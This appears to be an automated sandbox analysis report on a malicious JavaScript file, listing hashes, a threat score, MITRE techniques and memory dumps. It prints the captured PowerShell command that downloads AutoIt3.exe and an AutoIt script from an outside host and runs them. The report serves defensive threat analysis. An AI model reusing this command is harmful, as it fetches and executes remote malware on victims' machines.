0935ffbd6eb40f99494f748a513ac8272239d529c4b3930f07cdef620145d19d

Analysis

max time kernel
120s
max time network
124s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
27-10-2023 15:40

Target

advance.js
Size

135KB
MD5

8169317a5e6490aadd707cefe626a58e
SHA1

5e1b3fb8ab4faa121fdc203cbc51e7472cbbf1b0
SHA256

0935ffbd6eb40f99494f748a513ac8272239d529c4b3930f07cdef620145d19d
SHA512

246420d3e7356473ced3aa57d6758162ed0eaa3d9343e1529044291e3c5f07c1e0d279546dcacef82acb95c66455a988f8efed9bd1d5775a8a60a48fc7b2016b
SSDEEP

1536:BZUTSCM9Cfq7u02PmUVdGXjXl4xc5KTPBoMqS7j8frPWgtZPnCUQrNgZnFFQE/05:0T9U7hgaX6eerjqlI2IO6Mzqfh

Score

3^/10

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2600	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2600	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2348 wrote to memory of 2600	2348	wscript.exe	28
PID 2348 wrote to memory of 2600	2348	wscript.exe	28
PID 2348 wrote to memory of 2600	2348	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\advance.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2348
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/temp' -Type Directory -Force;cd 'C:/temp'; Invoke-WebRequest -Uri 'http://profitcentronline.com:2351' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://profitcentronline.com:2351/msiashzasyd' -OutFile 'ashzasyd.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'ashzasyd.au3'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2600

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

memory/2600-4-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download
memory/2600-5-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2600-6-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2600-7-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/2600-9-0x0000000001F50000-0x0000000001F58000-memory.dmp

Filesize
32KB

Download
memory/2600-8-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2600-10-0x00000000028F0000-0x0000000002970000-memory.dmp

Filesize
512KB

Download
memory/2600-11-0x000007FEF5AF0000-0x000007FEF648D000-memory.dmp

Filesize
9.6MB

Download